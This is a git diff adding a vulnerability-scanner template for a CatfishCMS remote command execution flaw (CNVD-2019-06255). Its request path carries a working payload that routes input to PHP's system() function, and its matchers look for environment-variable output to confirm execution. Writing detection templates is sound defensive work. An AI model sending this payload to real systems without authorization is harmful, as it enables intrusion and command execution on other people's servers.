diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml new file mode 100644 index 0000000000..9cebd8d7b0 --- /dev/null +++ b/cnvd/CNVD-2019-06255.yaml @@ -0,0 +1,27 @@ +id: CNVD-2019-06255 + +info: + name: CatfishCMS RCE + author: Lark-Lab + severity: medium + reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ + tags: rce,cvnd,catfishcms + +requests: + - method: GET + path: + - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + words: + - 'OS' + - 'PATH' + - 'SHELL' + - 'USER'